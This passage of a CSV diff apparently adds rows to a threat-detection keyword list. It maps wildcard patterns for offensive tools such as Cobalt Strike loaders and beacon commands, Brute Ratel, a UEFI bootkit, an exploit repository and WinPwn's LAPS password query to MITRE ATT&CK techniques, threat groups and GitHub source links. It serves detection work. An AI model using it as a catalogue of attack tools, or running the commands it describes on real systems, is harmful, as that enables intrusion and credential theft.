hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z"
+"*Bonfee/CVE-2022-0995*","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","490","71","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z"
+"*BooExecutorImpl.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z"
+"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z"
+"*BorjaMerino*Pazuzu*","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","70","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z"
+"*Bot_MSF_Exp_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*Bot_Python_Poc_Log4j2_VMwareHorizon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*bpassthehash*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*bpowerpick*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*bpsexec_command*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*bpsexec_command*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*bpsexec_psh*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*bpsinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*bpsinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*brave* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A"
+"*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A"
+"*brc4_ldap_sentinel.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*Brc4ConfigExtractor.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Brc4DecodeString*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*breg add *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z"
+"*breg delete *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z"
+"*breg query *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z"
+"*breg_add_string_value*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z"
+"*bremote_exec*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
